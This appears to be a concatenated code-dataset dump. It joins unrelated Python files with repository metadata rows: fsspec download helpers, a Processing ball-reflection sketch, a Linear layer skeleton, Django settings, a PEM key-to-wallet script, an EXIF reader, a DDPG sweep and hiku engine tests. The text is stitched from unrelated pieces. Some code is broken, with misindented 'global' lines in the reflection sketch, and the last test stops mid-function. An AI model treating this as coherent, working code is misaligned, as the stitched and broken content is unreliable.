return cls.filesystems[key]
def list_remote_files_fsspec(url: str, ttl: CacheExpiry = CacheExpiry.FILEINDEX) -> List[str]:
"""
A function used to create a listing of all files of a given path on the server.
The default ttl with ``CacheExpiry.FILEINDEX`` is "5 minutes".
:param url: The URL which should be searched for files.
:param ttl: The cache expiration time.
:returns: A list of strings representing the files from the path.
"""
fs = HTTPFileSystem(
use_listings_cache=True,
listings_expiry_time=not WD_CACHE_DISABLE and ttl.value,
listings_cache_type="filedircache",
listings_cache_location=cache_dir,
)
return fs.find(url)
def download_file(url: str, ttl: Optional[int] = CacheExpiry.NO_CACHE) -> BytesIO:
"""
A function used to download a specified file from the server.
:param url: The url to the file on the dwd server
:param ttl: How long the resource should be cached.
:returns: Bytes of the file.
"""
filesystem = NetworkFilesystemManager.get(ttl=ttl)
payload = filesystem.cat(url)
return BytesIO(payload)
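# Illustrative-only usage sketch (the URL is a placeholder, not part of the
# original module); it lists a remote directory and downloads the first file.
if __name__ == "__main__":
    index_url = "https://opendata.example.org/climate/daily/"  # hypothetical URL
    files = list_remote_files_fsspec(index_url, ttl=CacheExpiry.FILEINDEX)
    if files:
        payload = download_file(files[0], ttl=CacheExpiry.NO_CACHE)
        print(f"downloaded {len(payload.getvalue())} bytes")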
| 31.365591
| 101
| 0.680151
| 1,310
| 0.449092
| 0
| 0
| 1,154
| 0.395612
| 0
| 0
| 869
| 0.297909
|
65941fce079e2342f67bde15c5c07c193940a076
| 2,927
|
pyde
|
Python
|
mode/examples/Topics/Motion/Reflection1/Reflection1.pyde
|
kazimuth/processing.py
|
9aa1ddf7ebd4efed73a8c2a1ecf6d2c167b1faf1
|
[
"Apache-2.0"
] | 4
|
2016-08-09T14:14:36.000Z
|
2021-12-10T07:51:35.000Z
|
mode/examples/Topics/Motion/Reflection1/Reflection1.pyde
|
kazimuth/processing.py
|
9aa1ddf7ebd4efed73a8c2a1ecf6d2c167b1faf1
|
[
"Apache-2.0"
] | null | null | null |
mode/examples/Topics/Motion/Reflection1/Reflection1.pyde
|
kazimuth/processing.py
|
9aa1ddf7ebd4efed73a8c2a1ecf6d2c167b1faf1
|
[
"Apache-2.0"
] | null | null | null |
"""
Non-orthogonal Reflection
by Ira Greenberg.
Based on the equation (R = 2N(N * L) - L) where R is the reflection vector, N
is the normal, and L is the incident vector.
"""
# Position of left hand side of floor.
base1 = None
# Position of right hand side of floor.
base2 = None
# A list of subpoints along the floor path.
coords = []
# Variables related to moving ball.
position = None
velocity = None
r = 6
speed = 3.5
def setup():
    global base1, base2, position, velocity
size(640, 360)
fill(128)
base1 = PVector(0, height - 150)
base2 = PVector(width, height)
createGround()
# Start ellipse at middle top of screen.
position = PVector(width / 2, 0)
# Calculate initial random velocity.
velocity = PVector.random2D()
velocity.mult(speed)
def draw():
# Draw background.
fill(0, 12)
noStroke()
rect(0, 0, width, height)
# Draw base.
fill(200)
quad(base1.x, base1.y, base2.x, base2.y, base2.x, height, 0, height)
# Calculate base top normal.
baseDelta = PVector.sub(base2, base1)
baseDelta.normalize()
normal = PVector(-baseDelta.y, baseDelta.x)
# Draw ellipse.
noStroke()
fill(255)
ellipse(position.x, position.y, r * 2, r * 2)
# Move elipse.
position.add(velocity)
# Normalized incidence vector.
incidence = PVector.mult(velocity, -1)
incidence.normalize()
# Detect and handle collision.
for coord in coords:
# Check distance between ellipse and base top coordinates.
if PVector.dist(position, coord) < r:
# Calculate dot product of incident vector and base top normal.
dot = incidence.dot(normal)
# Calculate reflection vector.
# Assign reflection vector to direction vector.
velocity.set(2 * normal.x * dot - incidence.x,
2 * normal.y * dot - incidence.y, 0)
velocity.mult(speed)
# Draw base top normal at collision point.
stroke(255, 128, 0)
line(position.x, position.y,
position.x - normal.x * 100, position.y - normal.y * 100)
# Detect boundary collision.
# Right.
if position.x > width - r:
position.x = width - r
velocity.x *= -1
# Left.
if position.x < r:
position.x = r
velocity.x *= -1
# Top.
if position.y < r:
position.y = r
velocity.y *= -1
# Randomize base top.
base1.y = random(height - 100, height)
base2.y = random(height - 100, height)
createGround()
# Calculate variables for the ground.
def createGround():
    global coords
# Calculate length of base top.
baseLength = PVector.dist(base1, base2)
# Fill base top coordinate array.
coords = [PVector(base1.x + ((base2.x - base1.x) / baseLength) * i,
base1.y + ((base2.y - base1.y) / baseLength) * i)
for i in range(ceil(baseLength))]
| 25.232759
| 77
| 0.598223
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 964
| 0.329347
|
6594ce65379700398a3a74c57669881f0dce9a22
| 1,182
|
py
|
Python
|
linear.py
|
AliRzvn/HW1
|
d6420c1656800372aae78e18327612df540b674e
|
[
"MIT"
] | null | null | null |
linear.py
|
AliRzvn/HW1
|
d6420c1656800372aae78e18327612df540b674e
|
[
"MIT"
] | null | null | null |
linear.py
|
AliRzvn/HW1
|
d6420c1656800372aae78e18327612df540b674e
|
[
"MIT"
] | null | null | null |
import numpy as np
from module import Module
class Linear(Module):
def __init__(self, name, input_dim, output_dim, l2_coef=.0):
super(Linear, self).__init__(name)
self.l2_coef = l2_coef # coefficient of l2 regularization.
self.W = np.random.randn(input_dim, output_dim) # weights of the layer.
self.b = np.random.randn(output_dim, ) # biases of the layer.
self.dW = None # gradients of loss w.r.t. the weights.
self.db = None # gradients of loss w.r.t. the biases.
def forward(self, x, **kwargs):
"""
x: input array.
out: output of Linear module for input x.
**Save whatever you need for backward pass in self.cache.
"""
out = None
# todo: implement the forward propagation for Linear module.
return out
def backward(self, dout):
"""
dout: gradients of Loss w.r.t. this layer's output.
dx: gradients of Loss w.r.t. this layer's input.
"""
dx = None
# todo: implement the backward propagation for Linear module.
# don't forget to update self.dW and self.db.
return dx
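# The two methods above are intentionally left as TODOs in this skeleton. The
# standalone sketch below is a hypothetical reference for how the forward and
# backward passes could be completed (assuming batches of shape (N, input_dim)
# and the l2 penalty applied to the weights only); it is not the assignment's
# official solution.
def _linear_forward_sketch(x, W, b):
    # Affine transform: one row of output per input sample.
    return x.dot(W) + b
def _linear_backward_sketch(dout, x, W, l2_coef=0.0):
    # Gradients of the loss w.r.t. inputs, weights and biases.
    dW = x.T.dot(dout) + l2_coef * W   # include the l2 regularization term
    db = dout.sum(axis=0)
    dx = dout.dot(W.T)
    return dx, dW, db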
| 31.945946
| 80
| 0.600677
| 1,134
| 0.959391
| 0
| 0
| 0
| 0
| 0
| 0
| 610
| 0.516074
|
65958e7861004b1f3934ff47c4a5e6dfe2a86170
| 239
|
py
|
Python
|
iot/common_functions/all_imports.py
|
sankaet/IOT-DB
|
a554f49b9c25ae1a9a91b6a2564489b999da03bd
|
[
"MIT"
] | 1
|
2016-10-26T23:10:57.000Z
|
2016-10-26T23:10:57.000Z
|
iot/common_functions/all_imports.py
|
sankaet/IOT-DB
|
a554f49b9c25ae1a9a91b6a2564489b999da03bd
|
[
"MIT"
] | null | null | null |
iot/common_functions/all_imports.py
|
sankaet/IOT-DB
|
a554f49b9c25ae1a9a91b6a2564489b999da03bd
|
[
"MIT"
] | null | null | null |
from pymongo import MongoClient
from bson import ObjectId
from bson.json_util import dumps
from json import loads
client = MongoClient('localhost', 27017)
IOT_DB = client.iot_db
IOT_SCHEMAS = IOT_DB.iot_schemas
IOT_DATA = IOT_DB.iot_data
| 23.9
| 40
| 0.820084
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 11
| 0.046025
|
6598ac2ebf4cb397f3e2b86a4a598e93fd0dbafd
| 659
|
py
|
Python
|
pages/login_page.py
|
0verchenko/PageObject
|
b50ec33b6f511680e5be14b16c379df825b87285
|
[
"Apache-2.0"
] | null | null | null |
pages/login_page.py
|
0verchenko/PageObject
|
b50ec33b6f511680e5be14b16c379df825b87285
|
[
"Apache-2.0"
] | 1
|
2021-06-02T00:14:07.000Z
|
2021-06-02T00:14:07.000Z
|
pages/login_page.py
|
0verchenko/PageObject
|
b50ec33b6f511680e5be14b16c379df825b87285
|
[
"Apache-2.0"
] | null | null | null |
from .base_page import BasePage
from .locators import LoginPageLocators
class LoginPage(BasePage):
def should_be_login_page(self):
self.should_be_login_url()
self.should_be_login_form()
self.should_be_register_form()
def should_be_login_url(self):
assert "login" in self.browser.current_url
def should_be_login_form(self):
login_form = self.browser.find_element(*LoginPageLocators.LOGIN_FORM)
assert login_form.is_displayed()
def should_be_register_form(self):
register_form = self.browser.find_element(*LoginPageLocators.REGISTER_FORM)
assert register_form.is_displayed()
| 29.954545
| 83
| 0.740516
| 584
| 0.886191
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| 0.010622
|
65990aa07c9374074643ecde94fe1aa073f34786
| 4,310
|
py
|
Python
|
tests/test_schema.py
|
LeafyLappa/starlette-jsonapi
|
1cd7268fe78983c0203e4f65549f974d3f5d968f
|
[
"MIT"
] | 16
|
2020-07-05T18:12:41.000Z
|
2022-03-11T21:12:17.000Z
|
tests/test_schema.py
|
LeafyLappa/starlette-jsonapi
|
1cd7268fe78983c0203e4f65549f974d3f5d968f
|
[
"MIT"
] | 25
|
2020-07-04T17:06:40.000Z
|
2021-08-18T09:24:30.000Z
|
tests/test_schema.py
|
LeafyLappa/starlette-jsonapi
|
1cd7268fe78983c0203e4f65549f974d3f5d968f
|
[
"MIT"
] | 3
|
2020-07-10T14:17:44.000Z
|
2021-08-12T11:43:45.000Z
|
import pytest
from marshmallow_jsonapi import fields
from starlette.applications import Starlette
from starlette_jsonapi.resource import BaseResource
from starlette_jsonapi.schema import JSONAPISchema
def test_schema_urls(app: Starlette):
class TResource(BaseResource):
type_ = 'test-resource'
TResource.register_routes(app, '/')
class TSchema(JSONAPISchema):
id = fields.Str(dump_only=True)
name = fields.Str()
class Meta:
type_ = 'test-resource'
self_route = 'test-resource:get'
self_route_kwargs = {'id': '<id>'}
self_route_many = 'test-resource:get_many'
rv = TSchema().dump(dict(id='foo', name='foo-name'))
assert rv == {
'data': {
'id': 'foo',
'type': 'test-resource',
'attributes': {
'name': 'foo-name',
}
}
}
rv = TSchema(app=app).dump(dict(id='foo', name='foo-name'))
assert rv == {
'data': {
'id': 'foo',
'type': 'test-resource',
'attributes': {
'name': 'foo-name',
},
'links': {
'self': '/test-resource/foo',
},
},
'links': {
'self': '/test-resource/foo',
},
}
def test_prefixed_schema_urls(app: Starlette):
class TResource(BaseResource):
type_ = 'test-resource'
TResource.register_routes(app, '/')
class TSchema(JSONAPISchema):
id = fields.Str(dump_only=True)
name = fields.Str()
class Meta:
type_ = 'test-resource'
self_route = 'test-resource:get'
self_route_kwargs = {'id': '<id>'}
self_route_many = 'test-resource:get_many'
app.url_prefix = 'https://example.com'
rv = TSchema(app=app).dump(dict(id='foo', name='foo-name'))
assert rv == {
'data': {
'id': 'foo',
'type': 'test-resource',
'attributes': {
'name': 'foo-name',
},
'links': {
'self': 'https://example.com/test-resource/foo',
},
},
'links': {
'self': 'https://example.com/test-resource/foo',
},
}
def test_schema_raises_wrong_meta_parameters():
with pytest.raises(ValueError) as exc:
class TSchema(JSONAPISchema):
id = fields.Str(dump_only=True)
name = fields.Str()
class Meta:
type_ = 'test-resource'
self_url = 'foo'
assert str(exc.value) == 'Use `self_route` instead of `self_url` when using the Starlette extension.'
with pytest.raises(ValueError) as exc:
class TSchema2(JSONAPISchema):
id = fields.Str(dump_only=True)
name = fields.Str()
class Meta:
type_ = 'test-resource'
self_url_kwargs = 'foo'
assert str(exc.value) == 'Use `self_route_kwargs` instead of `self_url_kwargs` when using the Starlette extension.'
with pytest.raises(ValueError) as exc:
class TSchema3(JSONAPISchema):
id = fields.Str(dump_only=True)
name = fields.Str()
class Meta:
type_ = 'test-resource'
self_url_many = 'foo'
assert str(exc.value) == 'Use `self_route_many` instead of `self_url_many` when using the Starlette extension.'
with pytest.raises(ValueError) as exc:
class TSchema4(JSONAPISchema):
id = fields.Str(dump_only=True)
name = fields.Str()
class Meta:
type_ = 'test-resource'
self_route_kwargs = 'foo'
assert str(exc.value) == 'Must specify `self_route` Meta option when `self_route_kwargs` is specified.'
def test_schema_excludes_unknown():
class TSchema(JSONAPISchema):
id = fields.Str(dump_only=True)
name = fields.Str()
class Meta:
type_ = 'test-resource'
d = TSchema().loads('{"data": {"type": "test-resource", "id": "foo", "attributes": {"unknown": "bar"}}}')
assert d == {}
d = TSchema().loads('{"data": {"type": "test-resource", "id": "foo", "attributes": {"name": "bar"}, "unknown": 1}}')
assert d == {'name': 'bar'}
| 30.567376
| 120
| 0.542691
| 1,716
| 0.398144
| 0
| 0
| 0
| 0
| 0
| 0
| 1,215
| 0.281903
|
659af9491af7136fafb0016f0624386d06bcfa4b
| 3,280
|
py
|
Python
|
demo/demo/settings.py
|
ikcam/django-boilerplate
|
d8253665d74f0f18cf9a5fd46772598a60f20c5c
|
[
"Apache-2.0"
] | 5
|
2016-10-02T04:57:10.000Z
|
2019-08-12T22:22:39.000Z
|
demo/demo/settings.py
|
ikcam/django-boilerplate
|
d8253665d74f0f18cf9a5fd46772598a60f20c5c
|
[
"Apache-2.0"
] | null | null | null |
demo/demo/settings.py
|
ikcam/django-boilerplate
|
d8253665d74f0f18cf9a5fd46772598a60f20c5c
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Django settings for demo project.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
from django.core.urlresolvers import reverse_lazy
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
DEBUG = True
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '__SHHH_ITS_A_SECRET__'
ALLOWED_HOSTS = []
ADMINS = []
MANAGERS = []
INTERNAL_IPS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.humanize',
# To make it look nice
'bootstrap3',
# Boilerplate
'boilerplate',
# Apps
'account',
'store',
)
MIDDLEWARE = (
'django.middleware.common.BrokenLinkEmailsMiddleware',
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'demo.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
os.path.join(BASE_DIR, 'templates/'),
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.core.context_processors.media',
'django.contrib.messages.context_processors.messages',
],
},
},
]
TEMPLATE_LOADERS = [
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader'
]
LOCALE_PATHS = [
os.path.join(BASE_DIR, 'locale'),
]
WSGI_APPLICATION = 'demo.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files
MEDIA_ROOT = os.path.join(BASE_DIR, 'media/')
STATIC_ROOT = os.path.join(BASE_DIR, 'static/')
MEDIA_URL = '/media/'
STATIC_URL = '/static/'
LOGIN_URL = reverse_lazy('account:login')
| 24.661654
| 71
| 0.690549
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,154
| 0.656707
|
659cc327a8d71d143b1d4f60325b26e2f3b52adc
| 818
|
py
|
Python
|
pem_recover.py
|
EggPool/gpg-experiments
|
82f79fc05dbc745a84b9bb14c60161716cd08756
|
[
"MIT"
] | null | null | null |
pem_recover.py
|
EggPool/gpg-experiments
|
82f79fc05dbc745a84b9bb14c60161716cd08756
|
[
"MIT"
] | null | null | null |
pem_recover.py
|
EggPool/gpg-experiments
|
82f79fc05dbc745a84b9bb14c60161716cd08756
|
[
"MIT"
] | null | null | null |
from Cryptodome.PublicKey import RSA
import hashlib
import json
def recover(key):
private_key_readable = key.exportKey().decode("utf-8")
public_key_readable = key.publickey().exportKey().decode("utf-8")
address = hashlib.sha224(public_key_readable.encode("utf-8")).hexdigest()
wallet_dict = {}
wallet_dict['Private Key'] = private_key_readable
wallet_dict['Public Key'] = public_key_readable
wallet_dict['Address'] = address
with open ("wallet_recovered.der", 'w') as wallet_file:
json.dump (wallet_dict, wallet_file)
print ("Wallet recovered to: wallet_recovered.der")
return (address, "wallet_recovered.der")
# Edit with your pem file
with open('privkey.pem', 'r') as f:
private_key_readable = f.read()
key = RSA.importKey(private_key_readable)
recover(key)
| 30.296296
| 77
| 0.720049
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 186
| 0.227384
|
659cf1416e415156d8b4e266bad74755407e575d
| 316
|
py
|
Python
|
arcade/python/arcade-theCore/06_LabyrinthOfNestedLoops/043_IsPower.py
|
netor27/codefights-arcade-solutions
|
69701ab06d45902c79ec9221137f90b75969d8c8
|
[
"MIT"
] | null | null | null |
arcade/python/arcade-theCore/06_LabyrinthOfNestedLoops/043_IsPower.py
|
netor27/codefights-arcade-solutions
|
69701ab06d45902c79ec9221137f90b75969d8c8
|
[
"MIT"
] | null | null | null |
arcade/python/arcade-theCore/06_LabyrinthOfNestedLoops/043_IsPower.py
|
netor27/codefights-arcade-solutions
|
69701ab06d45902c79ec9221137f90b75969d8c8
|
[
"MIT"
] | null | null | null |
import math
def isPower(n):
'''
Determine if the given number is a power of some non-negative integer.
'''
if n == 1:
return True
sqrt = math.sqrt(n)
    # the exponent can exceed sqrt(n) (e.g. 8 == 2 ** 3), so bound it by bit_length
    for a in range(2, int(sqrt) + 1):
        for b in range(2, n.bit_length() + 1):
if a ** b == n:
return True
return False
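# Quick illustrative checks (hypothetical values, not part of the original
# solution): perfect powers return True, everything else False.
assert isPower(1) is True      # 1 == 1 ** k
assert isPower(125) is True    # 5 ** 3
assert isPower(100) is True    # 10 ** 2
assert isPower(72) is False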
| 24.307692
| 74
| 0.506329
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 86
| 0.272152
|
659ffa3c1d30e46aa593ca5d32d54d54bd7d5e35
| 218
|
py
|
Python
|
plugins/pick/choices.py
|
rbracken/internbot
|
58b802e0dd7597ace12acd9342bb938e2f33c25d
|
[
"BSD-2-Clause"
] | 1
|
2016-09-24T16:00:06.000Z
|
2016-09-24T16:00:06.000Z
|
plugins/pick/choices.py
|
rbracken/internbot
|
58b802e0dd7597ace12acd9342bb938e2f33c25d
|
[
"BSD-2-Clause"
] | null | null | null |
plugins/pick/choices.py
|
rbracken/internbot
|
58b802e0dd7597ace12acd9342bb938e2f33c25d
|
[
"BSD-2-Clause"
] | null | null | null |
# Add your own choices here!
fruit = ["apples", "oranges", "pears", "grapes", "blueberries"]
lunch = ["pho", "timmies", "thai", "burgers", "buffet!", "indian", "montanas"]
situations = {"fruit":fruit, "lunch":lunch}
| 36.333333
| 79
| 0.62844
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 143
| 0.655963
|
65a027371c207094c43000aeb78dc0ce9124ddf6
| 1,806
|
py
|
Python
|
testing.py
|
blairg23/rename-images-to-datetime
|
e4fc8e34be9d651c4442b023d851bd64fd613e7f
|
[
"MIT"
] | null | null | null |
testing.py
|
blairg23/rename-images-to-datetime
|
e4fc8e34be9d651c4442b023d851bd64fd613e7f
|
[
"MIT"
] | null | null | null |
testing.py
|
blairg23/rename-images-to-datetime
|
e4fc8e34be9d651c4442b023d851bd64fd613e7f
|
[
"MIT"
] | null | null | null |
'''
Stolen straight from https://stackoverflow.com/a/51337247/1224827
'''
try:
import PIL
import PIL.Image as PILimage
from PIL import ImageDraw, ImageFont, ImageEnhance
from PIL.ExifTags import TAGS, GPSTAGS
import os
import glob
except ImportError as err:
exit(err)
class Worker(object):
def __init__(self, img):
self.img = img
self.get_exif_data()
        self.date = self.get_date_time()
super(Worker, self).__init__()
def get_exif_data(self):
exif_data = {}
info = self.img._getexif()
if info:
for tag, value in info.items():
decoded = TAGS.get(tag, tag)
if decoded == "GPSInfo":
gps_data = {}
for t in value:
sub_decoded = GPSTAGS.get(t, t)
gps_data[sub_decoded] = value[t]
exif_data[decoded] = gps_data
else:
exif_data[decoded] = value
self.exif_data = exif_data
# return exif_data
def get_date_time(self):
if 'DateTime' in self.exif_data:
date_and_time = self.exif_data['DateTime']
return date_and_time
def main():
date = image.date
print(date)
if __name__ == '__main__':
input_directory = os.path.join(os.getcwd(), 'input')
glob_path = os.path.join(input_directory, '*.jpg')
filepaths = glob.glob(glob_path)
for filepath in filepaths:
filename, extension = os.path.splitext(filepath)
try:
# img = PILimage.open(path + filename)
img = PILimage.open(filepath)
image = Worker(img)
date = image.date
print(date)
except Exception as e:
print(e)
| 26.558824
| 65
| 0.55814
| 941
| 0.521041
| 0
| 0
| 0
| 0
| 0
| 0
| 183
| 0.101329
|
65a0da8d520c64ade98d09bb5d2663a8e3d3134d
| 102
|
py
|
Python
|
tftool/access/__init__.py
|
antsfamily/tftool
|
0de72be13b3ca43e8a95c8be726c55841b389973
|
[
"MIT"
] | null | null | null |
tftool/access/__init__.py
|
antsfamily/tftool
|
0de72be13b3ca43e8a95c8be726c55841b389973
|
[
"MIT"
] | null | null | null |
tftool/access/__init__.py
|
antsfamily/tftool
|
0de72be13b3ca43e8a95c8be726c55841b389973
|
[
"MIT"
] | null | null | null |
from __future__ import absolute_import
from .load import load_ckpt
from .save import save_ckpt
| 17
| 39
| 0.794118
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
65a11747e48582b0ad97e6b0273c903fafd78306
| 1,730
|
py
|
Python
|
scripts/box3d_trpo/sweep_ddpg_0.py
|
fredshentu/public_model_based_controller
|
9301699bc56aa49ba5c699f7d5be299046a8aa0c
|
[
"MIT"
] | null | null | null |
scripts/box3d_trpo/sweep_ddpg_0.py
|
fredshentu/public_model_based_controller
|
9301699bc56aa49ba5c699f7d5be299046a8aa0c
|
[
"MIT"
] | null | null | null |
scripts/box3d_trpo/sweep_ddpg_0.py
|
fredshentu/public_model_based_controller
|
9301699bc56aa49ba5c699f7d5be299046a8aa0c
|
[
"MIT"
] | null | null | null |
import os
from rllab.envs.normalized_env import normalize
from rllab.misc.instrument import stub, run_experiment_lite
from sandbox.rocky.tf.envs.base import TfEnv
from rllab.envs.gym_env import GymEnv
from railrl.algos.ddpg import DDPG
from railrl.policies.nn_policy import FeedForwardPolicy
from railrl.qfunctions.nn_qfunction import FeedForwardCritic
from rllab.exploration_strategies.ou_strategy import OUStrategy
from railrl.launchers.launcher_util import get_env_settings
from railrl.core.tf_util import BatchNormConfig
import itertools
import tensorflow as tf
stub(globals())
# Param ranges
seed = 0
policy_lrs = [1e-5, 1e-4, 1e-3]
qf_lrs = [1e-5, 1e-4, 1e-3]
gammas = [0.9, 0.99, 0.995]
taus = [1e-3, 1e-2]
for policy_lr, qf_lr, gamma, tau in itertools.product(policy_lrs, qf_lrs, gammas, taus):
env = TfEnv(normalize(env=GymEnv('Box3dReach-v4',record_video=False, \
log_dir='/tmp/gym_test',record_log=False)))
es = OUStrategy(env_spec=env.spec)
qf = FeedForwardCritic(
name_or_scope="critic",
env_spec=env.spec,
hidden_nonlinearity=tf.nn.tanh,
)
policy = FeedForwardPolicy(
name_or_scope="actor",
env_spec=env.spec,
hidden_nonlinearity=tf.nn.tanh,
)
algo = DDPG(
env,
es,
policy,
qf,
"/data0/dianchen/box3d/ddpg_box3d_state_v4_tf_policy_{0}_qf_{1}_gamma_{2}_tau_{3}".format(
policy_lr,
qf_lr,
gamma,
tau,
),
qf_learning_rate=qf_lr,
policy_learning_rate=policy_lr,
discount=gamma,
soft_target_tau=tau,
gpu_ratio=0.25,
)
run_experiment_lite(
algo.train(),
exp_prefix="ddpg_box3d_state_v4_tf_policy_{0}_qf_{1}_gamma_{2}_tau_{3}".format(
policy_lr,
qf_lr,
gamma,
tau,
),
n_parallel=1,
snapshot_mode="last",
seed=seed,
mode="local"
)
| 23.378378
| 92
| 0.750289
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 214
| 0.123699
|
65a1934b198c619626a687dd053ddc9910070a15
| 17,974
|
py
|
Python
|
tests/test_engine.py
|
popravich/hiku
|
4ce6b46302de61fc17016ddf3af3f378b3fce119
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_engine.py
|
popravich/hiku
|
4ce6b46302de61fc17016ddf3af3f378b3fce119
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_engine.py
|
popravich/hiku
|
4ce6b46302de61fc17016ddf3af3f378b3fce119
|
[
"BSD-3-Clause"
] | 1
|
2022-01-20T17:03:23.000Z
|
2022-01-20T17:03:23.000Z
|
import re
import pytest
from hiku import query as q
from hiku.graph import Graph, Node, Field, Link, Option, Root
from hiku.types import Record, Sequence, Integer, Optional, TypeRef
from hiku.utils import listify
from hiku.engine import Engine, pass_context, Context
from hiku.builder import build, Q
from hiku.executors.sync import SyncExecutor
from .base import check_result, ANY, Mock
@listify
def id_field(fields, ids):
for i in ids:
yield [i for _ in fields]
OPTION_BEHAVIOUR = [
(Option('op', None), {'op': 1812}, {'op': 1812}),
(Option('op', None, default=None), {}, {'op': None}),
(Option('op', None, default=None), {'op': 2340}, {'op': 2340}),
(Option('op', None, default=3914), {}, {'op': 3914}),
(Option('op', None, default=4254), {'op': None}, {'op': None}),
(Option('op', None, default=1527), {'op': 8361}, {'op': 8361}),
]
def execute(graph, query_, ctx=None):
engine = Engine(SyncExecutor())
return engine.execute(graph, query_, ctx=ctx)
def test_root_fields():
f1 = Mock(return_value=['boiardo'])
f2 = Mock(return_value=['isolde'])
graph = Graph([
Root([
Field('a', None, f1),
Field('b', None, f2),
]),
])
result = execute(graph, build([Q.a, Q.b]))
check_result(result, {'a': 'boiardo', 'b': 'isolde'})
f1.assert_called_once_with([q.Field('a')])
f2.assert_called_once_with([q.Field('b')])
def test_node_fields():
f1 = Mock(return_value=[1])
f2 = Mock(return_value=[['harkis']])
f3 = Mock(return_value=[['slits']])
graph = Graph([
Node('a', [
Field('b', None, f2),
Field('c', None, f3),
]),
Root([
Link('d', Sequence[TypeRef['a']], f1, requires=None),
]),
])
result = execute(graph, build([Q.d[Q.b, Q.c]]))
check_result(result, {'d': [{'b': 'harkis', 'c': 'slits'}]})
f1.assert_called_once_with()
f2.assert_called_once_with([q.Field('b')], [1])
f3.assert_called_once_with([q.Field('c')], [1])
def test_node_complex_fields():
f1 = Mock(return_value=[1])
f2 = Mock(return_value=[[{'f': 'marshes'}]])
f3 = Mock(return_value=[[{'g': 'colline'}]])
f4 = Mock(return_value=[[[{'h': 'magi'}]]])
graph = Graph([
Node('a', [
Field('b', Optional[Record[{'f': Integer}]], f2),
Field('c', Record[{'g': Integer}], f3),
Field('d', Sequence[Record[{'h': Integer}]], f4),
]),
Root([
Link('e', Sequence[TypeRef['a']], f1, requires=None),
]),
])
check_result(
execute(graph, build([Q.e[Q.b[Q.f], Q.c[Q.g], Q.d[Q.h]]])),
{'e': [{'b': {'f': 'marshes'},
'c': {'g': 'colline'},
'd': [{'h': 'magi'}]}]},
)
f1.assert_called_once_with()
f2.assert_called_once_with(
[q.Link('b', q.Node([q.Field('f')]))], [1],
)
f3.assert_called_once_with(
[q.Link('c', q.Node([q.Field('g')]))], [1],
)
f4.assert_called_once_with(
[q.Link('d', q.Node([q.Field('h')]))], [1],
)
def test_links():
fb = Mock(return_value=[1])
fc = Mock(return_value=[2])
fi = Mock(return_value=[3])
fd = Mock(return_value=[['boners']])
fe = Mock(return_value=[['julio']])
graph = Graph([
Node('a', [
Field('d', None, fd),
Field('e', None, fe),
]),
Root([
Field('i', None, fi),
Link('b', Sequence[TypeRef['a']], fb, requires=None),
Link('c', Sequence[TypeRef['a']], fc, requires='i'),
]),
])
result = execute(graph, build([Q.b[Q.d], Q.c[Q.e]]))
check_result(result, {'b': [{'d': 'boners'}],
'c': [{'e': 'julio'}]})
fi.assert_called_once_with([q.Field('i')])
fb.assert_called_once_with()
fc.assert_called_once_with(3)
fd.assert_called_once_with([q.Field('d')], [1])
fe.assert_called_once_with([q.Field('e')], [2])
@pytest.mark.parametrize('option, args, result', OPTION_BEHAVIOUR)
def test_field_option_valid(option, args, result):
f = Mock(return_value=['baking'])
graph = Graph([
Root([
Field('auslese', None, f, options=[option]),
]),
])
check_result(execute(graph, build([Q.auslese(**args)])),
{'auslese': 'baking'})
f.assert_called_once_with([q.Field('auslese', options=result)])
def test_field_option_unknown():
test_field_option_valid(
Option('inked', None), {'inked': 2340, 'unknown': 8775}, {'inked': 2340}
)
def test_field_option_missing():
graph = Graph([
Root([
Field('poofy', None, Mock(), options=[Option('mohism', None)]),
]),
])
with pytest.raises(TypeError) as err:
execute(graph, build([Q.poofy]))
err.match(r'^Required option "mohism" for Field\(\'poofy\', '
r'(.*) was not provided$')
@pytest.mark.parametrize('option, args, result', OPTION_BEHAVIOUR)
def test_link_option_valid(option, args, result):
f1 = Mock(return_value=[1])
f2 = Mock(return_value=[['aunder']])
graph = Graph([
